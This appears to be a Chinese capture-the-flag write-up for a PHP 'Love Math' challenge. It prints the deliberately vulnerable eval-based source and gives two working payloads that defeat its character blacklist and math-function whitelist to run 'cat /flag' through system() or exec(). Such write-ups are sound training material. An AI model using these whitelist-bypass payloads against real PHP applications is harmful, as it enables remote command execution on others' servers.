进入之后直接就是源码
<?php
// 关闭所有错误报告,以防止将敏感信息泄露给用户
error_reporting(0);
// 检查是否传入了 GET 参数 'c'
// 如果没有传入,则显示当前文件的源代码
if (!isset($_GET['c'])) {
show_source(__FILE__);
} else {
// 读取 GET 参数 'c' 的值到 $content
$content = $_GET['c'];
// 如果 $content 的长度超过 80 字符,则终止执行并输出错误信息
if (strlen($content) >= 80) {
die("太长了不会算");
}
// 定义一个黑名单字符数组,包含空格、制表符、回车、换行、引号、反引号和方括号
$blacklist = [' ', '\t', '\r', '\n', '\'', '"', '`', '\[', '\]'];
// 遍历黑名单字符数组,检查 $content 是否包含任意黑名单字符
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("请不要输入奇奇怪怪的字符");
}
}
// 定义一个白名单函数数组,包含常用的数学函数
// 这些函数是允许在用户输入中使用的函数
$whitelist = [
'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert',
'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp',
'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite',
'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax',
'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin',
'sinh', 'sqrt', 'srand', 'tan', 'tanh'
];
// 使用正则表达式匹配 $content 中所有可能的函数名称,并存储在 $used_funcs 数组中
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
// 遍历 $used_funcs 数组,检查是否有不在白名单中的函数名
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("请不要输入奇奇怪怪的函数");
}
}
// 使用 eval 函数计算并输出 $content 的值
// 注意:eval 函数会执行传入的 PHP 代码,存在严重的安全风险
eval('echo ' . $content . ';');
}
?>
方法一
有字符限制,有黑白名单
我们要利用
eval('echo ' . $content . ';');
去catflag
首先我们要了解
在 PHP 中,可以通过将函数名存储在一个字符串变量中,然后通过该变量动态调用该函数。这种方法被称为动态函数调用,例如:
$a='system';
$a('cat /flag');
就会执行system('cat /flag')
我们最终要做到的就是
?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag
白名单里有一个函数base_convert()
base_convert() 函数在任意进制之间转换数字
我们可以利用他来创造出hex2bin
hex2bin是由小写字母和数字组成符合36进制的规则
可以看出
hex2bin的36进制就是hex2bin
于是我们呢可以将hex2bin的10进制数转为hex2bin然后利用hex2bin再将_GET的转为16进制数转为字符串
base_convert(37907361743,10,36)//hex2bin
dechex(1598506324)//5f474554就是_GET的十六进制
//dechex() 函数将十进制数转换为十六进制数
组成base_convert(37907361743,10,36)(dechex(1598506324))=>hex2bin(5f474554)=_GET
之所以用dechex而不是继续用base_convert是因为有长度限制
构造出_GET接下来就可以直接打了
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag
//就是:c=$pi=_GET;$_GET['pi']($_GET('abs'))$pi=system&abs=cat /flag
=>c=$pi=_GET;system('cat /flag')$pi=system&abs=cat /flag
最终可以看为system("cat /flag")
方法二
来自
https://www.cnblogs.com/20175211lyz/p/11588219.html
感觉这个方法很好
方法如下
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
$pi(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
最终exec(getallheaders(){1})
//操作xx和yy,中间用逗号隔开,echo都能输出
echo xx,yy
//getallheaders() 函数返回一个包含所有 HTTP 请求头的关联数组,其中数组的键是请求头的名称,值是对应的请求头值。
就是传
?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
在加一个请求头
1:cat /flag
不知道是什莫原因我一直不成功
标签:10,convert,Love,GET,初赛,flag,base,pi,Math From: https://www.cnblogs.com/dghh/p/18315008